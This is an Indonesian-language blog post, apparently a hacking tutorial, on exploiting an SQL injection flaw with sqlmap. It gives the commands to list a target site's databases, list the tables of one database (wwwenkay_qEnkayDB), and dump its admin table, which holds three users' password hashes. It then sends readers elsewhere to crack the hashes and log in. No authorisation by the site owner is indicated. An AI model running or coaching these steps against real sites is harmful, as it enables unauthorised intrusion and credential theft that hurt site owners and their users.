Haii broo apa kabar, baik kan :D
Setelah kemaren saya sharing tentang cek celah website dengan kali linux, dan ternyata site yg saya test tersebut mempunyai vuln sqli,yasudah bro lansung praktek aja ya

Pertama kita akan lihat dulu isi dari database situs tersebut
sqlmap.py -u www.sitetarget.com/display.php?catId=22 --dbs
sqlmap.py -u www.sitetarget.com/display.php?catId=22 --dbs

Tunggu bentar hingga muncul database target

Result database

site tersebut terdapat 2 database
[*] information_schema
[*] wwwenkay_qEnkayDB
sekarang kita akan melihat isi tabel dari database wwwenkay_qEnkayDB
sqlmap.py -u www.sitetarget.com/display.php?catId=22 -D nama_database --tables
 sqlmap.py -u www.sitetarget.com/display.php?catId=22 -D nama_database --tables

Tunggu hingga muncul tabel

Result List Table

dalam database tersebut terdapat 15 tabel,nah sekarang kita ingin melihat isi dari tabel admin
sqlmap.py -u www.sitetarget.com/display.php?catId=22 -D nama_database -T nama_tabel --dump
sqlmap.py -u www.sitetarget.com/display.php?catId=22 -D nama_database -T nama_tabel --dump

Result Table

wah ternyata terdapat 3 user dan passwordnya berupa hash,untuk masuk ke dalam site tersebut kita harus decrypt dulu ,nah untuk cara decrypt password hash kalian bisa cari caranya di sini

Posting Komentar

 
Top